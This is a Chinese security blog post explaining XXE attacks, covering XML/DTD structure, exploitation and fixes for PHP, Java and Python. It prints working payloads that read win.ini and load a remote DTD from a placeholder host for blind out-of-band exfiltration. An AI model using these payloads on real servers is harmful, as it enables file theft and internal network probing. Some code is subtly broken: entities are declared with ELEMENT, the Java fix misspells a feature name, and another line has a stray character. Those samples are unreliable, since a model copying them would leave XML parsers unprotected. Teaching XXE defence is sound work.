XXE原理利用防御

最新推荐文章于 2024-04-19 14:46:29 发布
最新推荐文章于 2024-04-19 14:46:29 发布
阅读量488 收藏 1
点赞数
分类专栏: 渗透测试学习 文章标签: 安全 网络 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longlangci/article/details/130407572
版权

XXE原理利用防御

一、XML定义
1、定义

XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。

2、原因

应用程序解析XML时,没有过滤外部实体的加载,导致加载了恶意的外部文件,造成命令执行、文件读取、内网扫描、内网应用攻击等危害。

二、文档结构
1、结构

XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素。

<?xml version="1.0" encoding="gb2312" encoding="UTF-8" ?>	//xml声明、版本、编码。
<!DOCTYPE root system"http://www.xxx.com/file"
[	//定义DTD文件,格式为:root指定节点名称,system声明要使用的外部DTD文件路径,后面加文件URL,注意[]包裹。
<!ELEMENT root (other)>	//元素声明,声明xml中包含的元素,声明中需要指定元素名称(root、other)和元素类别、内容等。
<!ELEMENT to (#PCDATA)>	//<!--定义to元素为#PCDATA类型-->
<!ELEMENT generalentity "content">	//ELEMENT标签用于声明实体,实体分为:预定义实体、普通实体、参数实体,此处定义了普通实体generalentity,内容为content。
<!ELEMENT %extendentity SYSTEM "http://www.xxx.com/file">	//定义参数实体,格式为:<!ELEMENT % 参数名称 参数内容> 
]>
三、DTD的基础知识
1、定义

Document Type Definition即文档类型定义,用来为XML文档定义语义约束。可以嵌入在XML文档中(内部声明),也可以独立的放在一个文件中(外部引用),由于其支持的数据类型有限,无法对元素或属性的内容进行详细规范,在可读性和扩展性方面也比不上XML Schema。

2、使用DTD实体的攻击方式
1、DTD内部声明
<!DOCTYPE 根元素 [元素声明]>
2、DTD外部引用
<!DOCTYPE 根元素名称 SYSTEM "外部DTD的URI">
3、引用公共DTD
<!DOCTYPE 根元素名称 PUBLIC "DTD标识名" "公用DTD的URI">
四、XXE的利用方式DTD
1、可以干的事

利用XXE漏洞可以进行拒绝服务攻击、文件读取、命令执行、XSS注入、SQL注入、内外端口扫描、入侵内网站点等。内网探测和入侵是利用XXE中支持的协议进行内网主机和端口发现,可以理解是使用XXE进行SSRF的利用。

2、场景

一般XXE利用分为两大场景:有回显和无回显。有回显的情况下可以直接在页面中看到Payload的执行结果或现象,无回显的情况又称为Blind XXE,可以使用外带数据通道提取数据。

有回显情况
方法一:
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://C:/windows/win.ini">]>
<foo>&xxe;</foo>
方法二:
<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY % xxe SYSTEM "http://xxx.xxx.xxx/evil.dtd">%xxe;]>
<foo>&evil;</foo>
无回显情况
使用php://filter获取目标文件的内容
<!DOCTYPE convert[<!ENTITY % remote SYSTEM "http://xxx.xxx.xxx/test.dtd">%remote;%int;%send;]>
五、CTF中考题
1、截取数据包

在这里插入图片描述
在这里插入图片描述

2、构造Payload

在这里插入图片描述

六、XXE漏洞修复与防御
1、PHP
libxml_disable_entity_loader(true);
2、JAVA
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false)l
setFeature("http://apache.org/xml/features/disallow-doctype-dec1",true);
setFeature("http://xml.org/sax/features/external-general-entities",false);
setFeature("http://xml.org/sax/features/external-parameter-entities",false);
3、Python
from lxml import etree
xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
4、手动黑名单过滤
过滤关键词:<!DOCTYPE>、<!ENTITY SYSTEM>、<!PUBLIC>
5、修复建议

(1)禁止使用外部实体。

(2)过滤用户提交的XML数据,防止出现非法内容。

七、附录
https://xz.aliyun.com/t/3357#toc-21
5、修复建议

(1)禁止使用外部实体。

(2)过滤用户提交的XML数据,防止出现非法内容。

七、附录
https://xz.aliyun.com/t/3357#toc-21
liebe1*1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WEB漏洞——XXE
qq_63594215的博客
04-12 847
本次文章主要介绍XXE漏洞的原理利用以及防御的过程,另外还有介绍一点XML的基础知识,详情请见下文。a) xml,eXtensible Markup Language,可扩展标记语言,是一种标记语言,使用简单标记描述数据b) xml是一种非常灵活的语言,没有固定的标签,所有标签都可以自定义c) 通常,xml被用于信息的传递和记录,因此,xml经常被用于充当配置文件如果把HTML和XML进行对比的话,HTML进行对比的话,HTML旨在显示数据信息,而XML旨在用来进行数据的传输和存储。
SCAN_XXE:利用XML XXE漏洞
05-07
XML External Entity(XXE,XML外部实体)漏洞是...通过理解XXE的工作原理和采取上述防御措施,开发者可以有效保护他们的Python应用免受此类攻击。同时,持续关注最新的安全动态和更新,确保使用的库和框架也是安全的。
XXE漏洞及防御
2301_76717406的博客
03-24 1155
&xxe;
xxe的攻击及防御
土拨鼠挖洞中的博客
06-30 6549
xml文档的基础组成XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素; DTD实体DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量,可以内部声明或外部引用。 实体又分为一般实体和参数实体1,一般实体的声明语法:&lt;!ENTITY实体名 "实...
XXE漏洞原理/防御
热门推荐
wangyuxiang946的博客
07-16 1万+
XXE又叫 XML外部实体注入 , 攻击者修改DTD引入的外部文件 , 从而执行攻击 。
XXE攻击与防御
qq_56327824的博客
03-26 6987
XXE XXE是一种很常见的漏洞类型危害也挺大的,如果一个web服务器通过用户上传处理XML文件或POST请求时,那么可能就会存在漏洞。 前段时间比较出名的微信支付的xxe漏洞 漏洞简历 XXE就是XML外部实体注入,当服务器允许引用外部实体时,同过构建恶意内容来攻击网站 产生原因 解析xml文件时允许加载外部实体,并且实体的URL支持file://和PHP://等协议,没有过滤用户提交的参数 危害 读取任意文件 执行系统命令 探测内网端口 攻击内网网站 DOS攻击 … 漏洞检测 利用burp检测那些接
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXE(XML External Entity)漏洞,全称为XML外部实体注入...理解其原理、危害、检测和利用方式,以及如何修复和防御,对于保障信息系统安全至关重要。对于初学者,通过实践靶场可以更好地理解和掌握XXE漏洞的相关知识。
XXE - How to become a Jedi
02-20
### XXE漏洞详解:从入门到精通 #### XXE简介 **XXE(XML External Entity)** 漏洞是一种安全漏洞,它...通过了解 XXE 的工作原理、检测方法以及如何防御这些漏洞,开发者可以更好地保护他们的应用程序免受攻击。
信息安全_xxe注入应用与拓展.pptx
08-14
**XXE防御措施:** 1. **禁用外部实体加载**:通过编程语言提供的API,如`libxml_disable_entity_loader(true)`,在解析XML前关闭外部实体加载。 2. **限制XML解析器的配置**:避免解析器启用不必要或危险的特性...
XXE漏洞原理防御方式。
dreamthe的博客
11-16 3070
写这篇文章目的就是想认真理理XEE这个漏洞,因为在学习过程中,听过老师的一些课,看过很多文章解释,我觉得讲的都是很官方话或者专业用语,对于初学者理解很难,可能我理解能力不够哈,嘻嘻。以下内容仅仅是我个人理解,以及我个人的比喻,比喻可以让你更好理解这个东西,这是我学习的一个方法,可是使的抽象的东西变得比较具体一些。 xml简单了解 XXE这个漏洞的理解,首先我们了解xml文档,因为该漏洞就是由xml文档引起的 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用.
XXE原理简介、防御方案
qq_37432174的博客
11-24 6516
某些应用程序允许XML 格式的数据输入和解析,可以通过引入外部实体的方式进行攻击。,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。
XXE原理利用防御
MAPLE102424的博客
05-15 317
XXE 漏洞全称XML External Entity Injection,即 xml 外部实体注入漏洞,XXE 漏洞发生在应用程序解析 XML 输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。
网络安全XXE漏洞复现及防御(上篇)(技术进阶)
weixin_70911257的博客
04-16 1291
xxe漏洞复现
XXE原理利用防御
安全大白
04-19 507
0x00 前言 一个认真搞安全的Student,博客用于学习总结,欢迎大家交流指出不足。 ***更欢迎大家去我的博客提出意见:***xiao’s blog 0x01 XXE原理 在讲XXE之前,先了解一下XML的结构 XXE即XML实体注入,漏洞主要发生在XML的DTD部分,关键字SYSTEM能够读取URI里面的内容,将读取到的内容赋值到实体中,XML在使用的过程中,将实体输出,从而产生漏洞。P...
什么是XXE攻击?如何进行防护
最新发布
HoewDec的博客
04-19 1614
SSRF形成的原因是服务端提供了从其他服务器应用获取数据的功能,在用户可控的情况下,未对目标地址进行过滤与限制,导致此漏洞的产生。SSRF在攻击中扮演了中间者的角色,有时候直接攻击无法成效,通过SSRF可以利用其他主机的漏洞,攻击目标。安全性很难做到正确,即使在当今具有安全意识的世界中,也存在一些严重的漏洞,例如 XML 外部实体 (XXE),它们被忽视并最终成为破坏的原因。攻击者通常在XML文档中嵌入恶意的外部实体引用,当XML解析器处理这些文档时,会触发对外部资源的访问,进而执行攻击者指定的恶意操作。
渗透测试-xxe之CTF考题实验及防御方法
lza20001103的博客
04-29 1512
xxe之CTF考题实验及防御方法
xxe漏洞的利用防御
qq_61714717的博客
12-13 470
xxe漏洞
XXE漏洞挖掘和防护
永远是少年
12-24 820
今天继续给大家介绍渗透测试相关知识,本文主要内容是XXE漏洞挖掘和防护。 一、XXE漏洞挖掘 (一)白盒代码审计 (二)黑盒人工测试 二、XXE漏洞防护
xxe漏洞原理防御方式
05-25
XXE漏洞的原理是通过在XML文档中插入恶意实体来触发解析器加载恶意实体,从而发起攻击。 以下是XXE漏洞的防御方式: 1.禁止使用外部实体:在解析XML文档时,应该禁止使用外部实体,避免攻击者利用外部实体来读取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值